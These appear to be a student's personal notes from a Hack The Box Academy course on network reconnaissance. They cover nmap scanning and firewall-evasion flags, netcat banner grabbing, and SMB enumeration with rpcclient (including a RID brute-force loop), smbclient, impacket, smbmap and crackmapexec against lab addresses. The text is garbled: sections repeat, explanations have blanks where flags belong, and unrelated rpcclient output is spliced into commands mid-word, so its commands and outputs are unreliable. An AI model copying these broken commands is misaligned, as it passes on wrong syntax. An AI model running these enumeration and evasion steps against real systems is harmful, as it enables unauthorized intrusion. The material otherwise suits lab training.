HTB

Notes

The big compliance players in information security are 

, 

, 

, and 

.

Project Organization Example

Tonyleevo@htb[/htb]$ tree Projects/

Projects/

└── Acme Company

├── EPT

│ ├── evidence

│ │ ├── credentials

│ │ ├── data

│ │ └── screenshots

│ ├── logs

│ ├── scans

│ ├── scope

│ └── tools

└── IPT

├── evidence

│ ├── credentials

│ ├── data

│ └── screenshots

├── logs

├── scans

├── scope

└── tools

TMUX

Using Tmux

Terminal multiplexers, like tmux or Screen, are great utilities for expanding a standard Linux terminal's features, like having multiple windows within one terminal and jumping between them. Let's see some examples of using tmux, which is the more common of the two. If tmux is not present on our Linux system, we can install it with the following command:

  Basic Tools

Tonyleevo@htb[/htb]$ sudo apt install tmux -y

Once we have tmux, we can start it by entering tmux as our command: 

The default key to input tmux commands prefix is [CTRL + B]. In order to open a new window in tmux, we can hit the prefix 'i.e. [CTRL + B]' and then hit C: 

We see the numbered windows at the bottom. We can switch to each window by hitting the prefix and then inputting the window number, like 0 or 1. We can also split a window vertically into panes by hitting the prefix and then [SHIFT + %]: 

We can also split into horizontal panes by hitting the prefix and then [SHIFT + "]: 

We can switch between panes by hitting the prefix and then the left or right arrows for horizontal switching or the up or down arrows for vertical switching. The commands above cover some basic tmux usage. It is a powerful tool and can be used for many things, including logging, which is very important during any technical engagement. This cheatsheet is a very handy reference. Also, this Introduction to tmux video by ippsec is worth your time.

Banner Grab Example

Netcat, ncat, or nc, is an excellent network utility for interacting with TCP/UDP ports. It can be used for many things during a pentest. Its primary usage is for connecting to shells, which we'll discuss later in this module. In addition to that, netcat can be used to connect to any listening port and interact with the service running on that port. For example, SSH is programmed to handle connections over port 22 to send all data and keys. We can connect to TCP port 22 with netcat:

  Basic Tools

Tonyleevo@htb[/htb]$ netcat 10.10.10.10 22

SSH-2.0-OpenSSH_8.4p1 Debian-3

As we can see, port 22 sent us its banner, stating that SSH is running on it. This technique is called Banner Grabbing, and can help identify what service is running on a particular port. Netcat comes pre-installed in most Linux distributions. We can also download a copy for Windows machines from this link. There's another Windows alternative to netcat coded in PowerShell called PowerCat. Netcat can also be used to transfer files between machines, as we'll discuss later.

nmap

We can use the 

 parameter to specify that 

 scripts should be used to try and obtain more detailed information. The 

 parameter instructs 

 to perform a version scan. In this scan, Nmap will fingerprint services on the target system and identify the service protocol, application name, and version. The version scan is underpinned by a comprehensive database of over 1,000 service signatures. Finally, 

 tells Nmap that we want to scan all 65,535 TCP ports.

Nmap Scripts

Specifying -sC will run many useful default scripts against a target, but there are cases when running a specific script is required. For example, in an assessment scope, we may be asked to audit a large Citrix installation. We could use this Nmap script to audit for the severe Citrix NetScaler vulnerability (CVE-2019–19781), while Nmap also has other scripts to audit a Citrix installation.

  Service Scanning

Tonyleevo@htb[/htb]$ locate scripts/citrix

/usr/share/nmap/scripts/citrix-brute-xml.nse

/usr/share/nmap/scripts/citrix-enum-apps-xml.nse

/usr/share/nmap/scripts/citrix-enum-apps.nse

/usr/share/nmap/scripts/citrix-enum-servers-xml.nse

/usr/share/nmap/scripts/citrix-enum-servers.nse

Banner Grabbing

As previously discussed, banner grabbing is a useful technique to fingerprint a service quickly. Often a service will look to identify itself by displaying a banner once a connection is initiated. Nmap will attempt to grab the banners if the syntax nmap -sV --script=banner <target> is specified. We can also attempt this manually using Netcat. Let us take another example, using the nc version of Netcat:

  Service Scanning

Tonyleevo@htb[/htb]$ nc -nv 10.129.42.253 21

(UNKNOWN) [10.129.42.253] 21 (ftp) open

220 (vsFTPd 3.0.3)

This reveals that the version of vsFTPd on the server is 3.0.3. We can also automate this process using Nmap's powerful scripting engine: nmap -sV --script=banner -p21 10.10.10.0/24.

FTP

It is worth gaining familiarity with FTP, as it is a standard protocol, and this service can often contain interesting data. A Nmap scan of the default port for FTP (21) reveals the vsftpd 3.0.3 installation that we identified previously. Further, it also reports that anonymous authentication is enabled and that a pub directory is available.

  Service Scanning

Tonyleevo@htb[/htb]$ nmap -sC -sV -p21 10.129.42.253

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-20 00:54 GMT

Nmap scan report for 10.129.42.253

Host is up (0.081s latency).

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x 2 ftp ftp 4096 Dec 19 23:50 pub

| ftp-syst:

| STAT:

| FTP server status:

| Connected to ::ffff:10.10.14.2

| Logged in as ftp

| TYPE: ASCII

| No session bandwidth limit

| Session timeout in seconds is 300

| Control connection is plain text

| Data connections will be plain text

| At session startup, client count was 3

| vsFTPd 3.0.3 - secure, fast, stable

|_End of status

Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds

smb enumeration

nmap --script smb-os-discovery.nse -p445 10.10.10.40

  Service Scanning

Tonyleevo@htb[/htb]$ smbclient -N -L \\\\10.129.42.253

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

users Disk

IPC$ IPC IPC Service (gs-svcscan server (Samba, Ubuntu))

SMB1 disabled -- no workgroup available

This reveals the non-default share users. Let us attempt to connect as the guest user.

  Service Scanning

Tonyleevo@htb[/htb]$ smbclient \\\\10.129.42.253\\users

Enter WORKGROUP\users's password:

Try "help" to get a list of possible commands.

smb: \> ls

NT_STATUS_ACCESS_DENIED listing \*

smb: \> exit

If we use the same scanning technique on the predefined list, the command will look like this:

  Host Discovery

Tonyleevo@htb[/htb]$ sudo nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5

Scanning Top 10 TCP Ports

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 --top-ports=10

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 15:36 CEST

Nmap scan report for 10.129.2.28

Host is up (0.021s latency).

PORT STATE SERVICE

21/tcp closed ftp

22/tcp open ssh

23/tcp closed telnet

25/tcp open smtp

80/tcp open http

110/tcp open pop3

139/tcp filtered netbios-ssn

443/tcp closed https

445/tcp filtered microsoft-ds

3389/tcp closed ms-wbt-server

MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

It is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. However, it is important to note that the Connect scan is slower than other types of scans because it requires the scanner to wait for a response from the target after each packet it sends, which could take some time if the target is busy or unresponsive.

Scans like the SYN scan (also known as a half-open scan) are generally considered more stealthy because they do not complete the full handshake, leaving the connection incomplete after sending the initial SYN packet. This minimizes the chance of triggering connection logs while still gathering port state information. Advanced IDS/IPS systems, however, have adapted to detect even these subtler techniques.

Connect Scan on TCP Port 443

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 443 --packet-trace --disable-arp-ping -Pn -n --reason -sT

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 16:26 CET

CONN (0.0385s) TCP localhost > 10.129.2.28:443 => Operation now in progress

CONN (0.0396s) TCP localhost > 10.129.2.28:443 => Connected

Nmap scan report for 10.129.2.28

Host is up, received user-set (0.013s latency).

PORT STATE SERVICE REASON

443/tcp open https syn-ack

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds

Filtered Ports

When a port is shown as filtered, it can have several reasons. In most cases, firewalls have certain rules set to handle specific connections. The packets can either be dropped, or rejected. When a packet gets dropped, Nmap receives no response from our target, and by default, the retry rate (--max-retries) is set to 10. This means Nmap will resend the request to the target port to determine if the previous packet was accidentally mishandled or not.

Let us look at an example where the firewall drops the TCP packets we send for the port scan. Therefore we scan the TCP port 139, which was already shown as filtered. To be able to track how our sent packets are handled, we deactivate the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping) again.

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 139 --packet-trace -n --disable-arp-ping -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 15:45 CEST

SENT (0.0381s) TCP 10.10.14.2:60277 > 10.129.2.28:139 S ttl=47 id=14523 iplen=44 seq=4175236769 win=1024 <mss 1460>

SENT (1.0411s) TCP 10.10.14.2:60278 > 10.129.2.28:139 S ttl=45 id=7372 iplen=44 seq=4175171232 win=1024 <mss 1460>

Nmap scan report for 10.129.2.28

Host is up.

PORT STATE SERVICE

139/tcp filtered netbios-ssn

MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 2.06 seconds

UDP Port Scan

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -F -sU

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 16:01 CEST

Nmap scan report for 10.129.2.28

Host is up (0.059s latency).

Not shown: 95 closed ports

PORT STATE SERVICE

68/udp open|filtered dhcpc

137/udp open netbios-ns

138/udp open|filtered netbios-dgm

631/udp open|filtered ipp

5353/udp open zeroconf

MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

nmap -A to resolve an IPs hostname

We can also specify the option (-oA) to save the results in all formats. The command could look like this:

  Saving the Results

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p- -oA target

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 12:14 CEST

Nmap scan report for 10.129.2.28

Host is up (0.0091s latency).

Not shown: 65525 closed ports

PORT STATE SERVICE

22/tcp open ssh

25/tcp open smtp

80/tcp open http

Default Scan

Performance

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.0/24 -F -oN tnet.default

<SNIP>

Nmap done: 256 IP addresses (10 hosts up) scanned in 32.44 seconds

Insane Scan

Performance

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.0/24 -F -oN tnet.T5 -T 5

<SNIP>

Nmap done: 256 IP addresses (10 hosts up) scanned in 18.07 seconds

Default Scan

  Performance

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.0/24 -F -oN tnet.default

<SNIP>

Nmap done: 256 IP addresses (10 hosts up) scanned in 32.44 seconds

Insane Scan

  Performance

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.0/24 -F -oN tnet.T5 -T 5

<SNIP>

Nmap done: 256 IP addresses (10 hosts up) scanned in 18.07 seconds

SYN-Scan

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 21,22,25 -sS -Pn -n --disable-arp-ping --packet-trace

ACK-Scan

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 21,22,25 -sA -Pn -n --disable-arp-ping --packet-trace

Scan by Using Decoys

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5

Testing Firewall Rule

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -n -Pn -p445 -O

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 01:23 CEST

Scan by Using Different Source IP

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0

SYN-Scan of a Filtered Port

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace

Connect To The Filtered Port

  Firewall and IDS/IPS Evasion

Tonyleevo@htb[/htb]$ ncat -nv --source-port 53 10.129.2.28 50000

nmap

We can use the 

 parameter to specify that 

 scripts should be used to try and obtain more detailed information. The 

 parameter instructs 

 to perform a version scan. In this scan, Nmap will fingerprint services on the target system and identify the service protocol, application name, and version. The version scan is underpinned by a comprehensive database of over 1,000 service signatures. Finally, 

 tells Nmap that we want to scan all 65,535 TCP ports.

Nmap Scripts

Specifying -sC will run many useful default scripts against a target, but there are cases when running a specific script is required. For example, in an assessment scope, we may be asked to audit a large Citrix installation. We could use this Nmap script to audit for the severe Citrix NetScaler vulnerability (CVE-2019–19781), while Nmap also has other scripts to audit a Citrix installation.

  Service Scanning

Tonyleevo@htb[/htb]$ locate scripts/citrix

/usr/share/nmap/scripts/citrix-brute-xml.nse

/usr/share/nmap/scripts/citrix-enum-apps-xml.nse

/usr/share/nmap/scripts/citrix-enum-apps.nse

/usr/share/nmap/scripts/citrix-enum-servers-xml.nse

/usr/share/nmap/scripts/citrix-enum-servers.nse

Banner Grabbing

As previously discussed, banner grabbing is a useful technique to fingerprint a service quickly. Often a service will look to identify itself by displaying a banner once a connection is initiated. Nmap will attempt to grab the banners if the syntax nmap -sV --script=banner <target> is specified. We can also attempt this manually using Netcat. Let us take another example, using the nc version of Netcat:

  Service Scanning

Tonyleevo@htb[/htb]$ nc -nv 10.129.42.253 21

(UNKNOWN) [10.129.42.253] 21 (ftp) open

220 (vsFTPd 3.0.3)

This reveals that the version of vsFTPd on the server is 3.0.3. We can also automate this process using Nmap's powerful scripting engine: nmap -sV --script=banner -p21 10.10.10.0/24.

FTP

It is worth gaining familiarity with FTP, as it is a standard protocol, and this service can often contain interesting data. A Nmap scan of the default port for FTP (21) reveals the vsftpd 3.0.3 installation that we identified previously. Further, it also reports that anonymous authentication is enabled and that a pub directory is available.

  Service Scanning

Tonyleevo@htb[/htb]$ nmap -sC -sV -p21 10.129.42.253

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-20 00:54 GMT

Nmap scan report for 10.129.42.253

Host is up (0.081s latency).

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x 2 ftp ftp 4096 Dec 19 23:50 pub

| ftp-syst:

| STAT:

| FTP server status:

| Connected to ::ffff:10.10.14.2

| Logged in as ftp

| TYPE: ASCII

| No session bandwidth limit

| Session timeout in seconds is 300

| Control connection is plain text

| Data connections will be plain text

| At session startup, client count was 3

| vsFTPd 3.0.3 - secure, fast, stable

|_End of status

Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds

smb enumeration

nmap --script smb-os-discovery.nse -p445 10.10.10.40

  Service Scanning

Tonyleevo@htb[/htb]$ smbclient -N -L \\\\10.129.42.253

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

users Disk

IPC$ IPC IPC Service (gs-svcscan server (Samba, Ubuntu))

SMB1 disabled -- no workgroup available

This reveals the non-default share users. Let us attempt to connect as the guest user.

  Service Scanning

Tonyleevo@htb[/htb]$ smbclient \\\\10.129.42.253\\users

Enter WORKGROUP\users's password:

Try "help" to get a list of possible commands.

smb: \> ls

NT_STATUS_ACCESS_DENIED listing \*

smb: \> exit

If we use the same scanning technique on the predefined list, the command will look like this:

  Host Discovery

Tonyleevo@htb[/htb]$ sudo nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5

Scanning Top 10 TCP Ports

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 --top-ports=10

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 15:36 CEST

Nmap scan report for 10.129.2.28

Host is up (0.021s latency).

PORT STATE SERVICE

21/tcp closed ftp

22/tcp open ssh

23/tcp closed telnet

25/tcp open smtp

80/tcp open http

110/tcp open pop3

139/tcp filtered netbios-ssn

443/tcp closed https

445/tcp filtered microsoft-ds

3389/tcp closed ms-wbt-server

MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

It is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. However, it is important to note that the Connect scan is slower than other types of scans because it requires the scanner to wait for a response from the target after each packet it sends, which could take some time if the target is busy or unresponsive.

Scans like the SYN scan (also known as a half-open scan) are generally considered more stealthy because they do not complete the full handshake, leaving the connection incomplete after sending the initial SYN packet. This minimizes the chance of triggering connection logs while still gathering port state information. Advanced IDS/IPS systems, however, have adapted to detect even these subtler techniques.

Connect Scan on TCP Port 443

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 443 --packet-trace --disable-arp-ping -Pn -n --reason -sT

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 16:26 CET

CONN (0.0385s) TCP localhost > 10.129.2.28:443 => Operation now in progress

CONN (0.0396s) TCP localhost > 10.129.2.28:443 => Connected

Nmap scan report for 10.129.2.28

Host is up, received user-set (0.013s latency).

PORT STATE SERVICE REASON

443/tcp open https syn-ack

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds

Filtered Ports

When a port is shown as filtered, it can have several reasons. In most cases, firewalls have certain rules set to handle specific connections. The packets can either be dropped, or rejected. When a packet gets dropped, Nmap receives no response from our target, and by default, the retry rate (--max-retries) is set to 10. This means Nmap will resend the request to the target port to determine if the previous packet was accidentally mishandled or not.

Let us look at an example where the firewall drops the TCP packets we send for the port scan. Therefore we scan the TCP port 139, which was already shown as filtered. To be able to track how our sent packets are handled, we deactivate the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping) again.

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 139 --packet-trace -n --disable-arp-ping -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 15:45 CEST

SENT (0.0381s) TCP 10.10.14.2:60277 > 10.129.2.28:139 S ttl=47 id=14523 iplen=44 seq=4175236769 win=1024 <mss 1460>

SENT (1.0411s) TCP 10.10.14.2:60278 > 10.129.2.28:139 S ttl=45 id=7372 iplen=44 seq=4175171232 win=1024 <mss 1460>

Nmap scan report for 10.129.2.28

Host is up.

PORT STATE SERVICE

139/tcp filtered netbios-ssn

MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 2.06 seconds

UDP Port Scan

  Host and Port Scanning

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -F -sU

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 16:01 CEST

Nmap scan report for 10.129.2.28

Host is up (0.059s latency).

Not shown: 95 closed ports

PORT STATE SERVICE

68/udp open|filtered dhcpc

137/udp open netbios-ns

138/udp open|filtered netbios-dgm

631/udp open|filtered ipp

5353/udp open zeroconf

MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

nmap -A to resolve an IPs hostname

We can also specify the option (-oA) to save the results in all formats. The command could look like this:

  Saving the Results

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p- -oA target

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 12:14 CEST

Nmap scan report for 10.129.2.28

Host is up (0.0091s latency).

Not shown: 65525 closed ports

PORT STATE SERVICE

22/tcp open ssh

25/tcp open smtp

80/tcp open http

find filtered dns version

nmap 10.129.2.48 -p 53 -Pn -sU -sV

nmap script

nmap -sV --script=http-enum -oA nibbles_nmap_http_enum 10.129.17.122

onyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 25 --script banner,smtp-commands

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 23:21 CEST

Nmap scan report for 10.129.2.28

Host is up (0.050s latency).

PORT STATE SERVICE

25/tcp open smtp

Nmap - Aggressive Scan

  Nmap Scripting Engine

Tonyleevo@htb[/htb]$ sudo nmap 10.129.2.28 -p 80 -A

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 01:38 CEST

Nmap scan report for 10.129.2.28

Host is up (0.012s latency).

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

|_http-generator: WordPress 5.3.4

|_http-server-header: Apache/2.4.29 (Ubuntu)

|_http-title: blog.inlanefreight.com

MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.4 - 3.10 (95%), Linux 3.1 (95%), Linux 3.2 (95%),

AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Synology DiskStation Manager 5.2-5644 (94%), Netgear RAIDiator 4.2.28 (94%),

Linux 2.6.32 - 2.6.35 (94%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

tcpdump

Tcpdump

  Service Enumeration

Tonyleevo@htb[/htb]$ sudo tcpdump -i eth0 host 10.10.14.2 and 10.129.2.28

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

SMB

 Service Scanning

Tonyleevo@htb[/htb]$ smbclient -N -L \\\\10.129.42.253

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

users Disk

IPC$ IPC IPC Service (gs-svcscan server (Samba, Ubuntu))

SMB1 disabled -- no workgroup available

This reveals the non-default share users. Let us attempt to connect as the guest user.

  Service Scanning

Tonyleevo@htb[/htb]$ smbclient \\\\10.129.42.253\\users

Enter WORKGROUP\users's password:

Try "help" to get a list of possible commands.

smb: \> ls

NT_STATUS_ACCESS_DENIED listing \*

smb: \> exit

smbclient -U bob \\\\10.129.42.253\\users

Samba

As mentioned earlier, there is an alternative implementation of the SMB server called Samba, which is developed for Unix-based operating systems. 

Restart Samba

  SMB

root@samba:~# sudo systemctl restart smbd

Now we can display a list (-L) of the server's shares with the smbclient command from our host. We use the so-called null session (-N), which is anonymous access without the input of existing users or valid passwords.

SMBclient - Connecting to the Share

  SMB

Tonyleevo@htb[/htb]$ smbclient -N -L //10.129.14.128

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

home Disk INFREIGHT Samba

dev Disk DEVenv

notes Disk CheckIT

IPC$ IPC IPC Service (DEVSM)

SMB1 disabled -- no workgroup available

For example, with domain-level security, the samba server acts as a member of a Windows domain. Each domain has at least one domain controller, usually a Windows NT server providing password authentication. This domain controller provides the workgroup with a definitive password server. The domain controllers keep track of users and passwords in their own NTDS.dit and Security Authentication Module (SAM) and authenticate each user when they log in for the first time and wish to access another machine's share.

Samba Status

  SMB

root@samba:~# smbstatus

Samba version 4.11.6-Ubuntu

PID Username Group Machine Protocol Version Encryption Signing

----------------------------------------------------------------------------------------------------------------------------------------

75691 sambauser samba 10.10.14.4 (ipv4:10.10.14.4:45564) SMB3_11 - -

Service pid Machine Connected at Encryption Signing

---------------------------------------------------------------------------------------------

notes 75691 10.10.14.4 Do Sep 23 00:12:06 2021 CEST -

Nmap

  SMB

Tonyleevo@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 15:15 CEST

Nmap scan report for sharing.inlanefreight.htb (10.129.14.128)

Host is up (0.00024s latency).

PORT STATE SERVICE VERSION

139/tcp open netbios-ssn Samba smbd 4.6.2

445/tcp open netbios-ssn Samba smbd 4.6.2

MAC Address: 00:00:00:00:00:00 (VMware)

Host script results:

|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| smb2-security-mode:

| 2.02:

|_ Message signing enabled but not required

| smb2-time:

| date: 2021-09-19T13:16:04

|_ start_date: N/A

Service detection performed. Please report any inco

RPCclient

  SMB

Tonyleevo@htb[/htb]$ rpcclient -U "" 10.129.14.128

Enter WORKGROUP\'s password:

rpcclient $>

The rpcclient offers us many different requests with which we can execute specific functions on the SMB server to get information. A complete list of all these functions can be found on the man page of the rpcclient.

RPCclient - Enumeration

  SMB

rpcclient $> srvinfo

DEVSMB Wk Sv PrQ Unx NT SNT DEVSM

platform_id : 500

os version : 6.1

server type : 0x809a03

rpcclient $> enumdomains

name:[DEVSMB] idx:[0x0]

name:[Builtin] idx:[0x1]

rpcclient $> querydominfo

Domain: DEVOPS

Server: DEVSMB

Comment: DEVSM┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~]

└──╼ [★]$ rpcclient -U "" 10.129.97.13

Password for [WORKGROUP\]:

rpcclient $> querydominfo

Domain: DEVOPS

Server: DEVSMB

Comment: InlaneFreight SMB server (Samba, Ubuntu)

Total Users: 0

Total Groups: 0

Total Aliases: 0

Sequence No: 1738509492

Force Logoff: -1

Domain Server State: 0x1

Server Role: ROLE_DOMAIN_PDC

Unknown 3: 0x1

Total Users: 2

Total Groups: 0

Total Aliases: 0

Sequence No: 1632361158

Force Logoff: -1

Domain Server State: 0x1

Server Role: ROLE_DOMAIN_PDC

Unknown 3: 0x1

rpcclient $> netshareenumall

netname: print$

remark: Printer Drivers

path: C:\var\lib\samba\printers

password:

netname: home

remark: INFREIGHT Samba

path: C:\home\

password:

netname: dev

remark: DEVenv

path: C:\home\sambauser\dev\

password:

netname: notes

remark: CheckIT

path: C:\mnt\notes\

password:

netname: IPC$

remark: IPC Service (DEVSM)

path: C:\tmp

password:

rpcclient $> netsharegetinfo notes

netname: notes

remark: CheckIT

path: C:\mnt\notes\

password:

type: 0x0

perms: 0

max_uses: -1

num_uses: 1

revision: 1

type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE

DACL

ACL Num ACEs: 1 revision: 2

---

ACE

type: ACCESS ALLOWED (0) flags: 0x00

Specific bits: 0x1ff

Permissions: 0x101f01ff: Generic all access SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS

SID: S-1-1-0

Rpcclient - User Enumeration

  SMB

rpcclient $> enumdomusers

user:[mrb3n] rid:[0x3e8]

user:[cry0l1t3] rid:[0x3e9]

rpcclient $> queryuser 0x3e9

User Name : cry0l1t3

Full Name : cry0l1t3

Home Drive : \\devsmb\cry0l1t3

Dir Drive :

Profile Path: \\devsmb\cry0l1t3\profile

Logon Script:

Description :

Workstations:

Comment :

Remote Dial :

Logon Time : Do, 01 Jan 1970 01:00:00 CET

Logoff Time : Mi, 06 Feb 2036 16:06:39 CET

Kickoff Time : Mi, 06 Feb 2036 16:06:39 CET

Password last set Time : Mi, 22 Sep 2021 17:50:56 CEST

Password can change Time : Mi, 22 Sep 2021 17:50:56 CEST

Password must change Time: Do, 14 Sep 30828 04:48:05 CEST

unknown_2[0..31]...

user_rid : 0x3e9

group_rid: 0x201

Rpcclient - Group Information

  SMB

rpcclient $> querygroup 0x201

Group Name: None

Description: Ordinary Users

Group Attribute:7┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~]

└──╼ [★]$ rpcclient -U "" 10.129.97.13

Password for [WORKGROUP\]:

rpcclient $> querydominfo

Domain: DEVOPS

Server: DEVSMB

Comment: InlaneFreight SMB server (Samba, Ubuntu)

Total Users: 0

Total Groups: 0

Total Aliases: 0

Sequence No: 1738509492

Force Logoff: -1

Domain Server State: 0x1

Server Role: ROLE_DOMAIN_PDC

Unknown 3: 0x1

Num Members:2

Brute Forcing User RIDs

  SMB

Tonyleevo@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

User Name : sambauser

user_rid : 0x1f5

group_rid: 0x201

User Name : mrb3n

user_rid : 0x3e8

group_rid: 0x201

User Name : cry0l1t3

user_rid : 0x3e9

group_rid: 0x201

Impacket - Samrdump.py

  SMB

Tonyleevo@htb[/htb]$ samrdump.py 10.129.14.128

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Retrieving endpoint list from 10.129.14.128

Found domain(s):┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~]

└──╼ [★]$ rpcclient -U "" 10.129.97.13

Password for [WORKGROUP\]:

rpcclient $> querydominfo

Domain: DEVOPS

Server: DEVSMB

Comment: InlaneFreight SMB server (Samba, Ubuntu)

Total Users: 0

Total Groups: 0

Total Aliases: 0

Sequence No: 1738509492

Force Logoff: -1

Domain Server State: 0x1

Server Role: ROLE_DOMAIN_PDC

Unknown 3: 0x1

. DEVSMB

. Builtin

[*] Looking up users in domain DEVSMB

Found user: mrb3n, uid = 1000

version

SMBmap

  SMB

Tonyleevo@htb[/htb]$ smbmap -H 10.129.14.128

[+] Finding open SMB ports....

[+] User SMB session established on 10.129.14.128...

[+] IP: 10.129.14.128:445 Name: 10.129.14.128

Disk Permissions Comment

---- ----------- -------

print$ NO ACCESS Printer Drivers

home NO ACCESS INFREIGHT Samba

dev NO ACCESS DEVenv

notes NO ACCESS CheckIT

IPC$ NO ACCESS IPC Service (DEVSM)

CrackMapExec

  SMB

Tonyleevo@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p ''

SMB 10.129.14.128 445 DEVSMB [*] Windows 6.1 Build 0 (name:DEVSMB) (domain:) (signing:False) (SMBv1:False)

SMB 10.129.14.128 445 DEVSMB [+] \:

SMB 10.129.14.128 445 DEVSMB [+] Enumerated shares

SMB 10.129.14.128 445 DEVSMB Share Permission

Enum4Linux-ng - Installation

  SMB

Tonyleevo@htb[/htb]$ git clone https://github.com/cddmp/enum4linux-ng.git

Tonyleevo@htb[/htb]$ cd enum4linux-ng

Tonyleevo@htb[/htb]$ pip3 insta┌─[us-academy-5]─[10.10.14.156]─[htb-ac-1723454@htb-jm5dgnol2e]─[~]

└──╼ [★]$ rpcclient -U "" 10.129.97.13

Password for [WORKGROUP\]:

rpcclient $> querydominfo

Domain: DEVOPS

Server: DEVSMB

Comment: InlaneFreight SMB server (Samba, Ubuntu)

Total Users: 0

Total Groups: 0

Total Aliases: 0

Sequence No: 1738509492

Force Logoff: -1

Domain Server State: 0x1

Server Role: ROLE_DOMAIN_PDC

Unknown 3: 0x1

ll -r requirements.txt

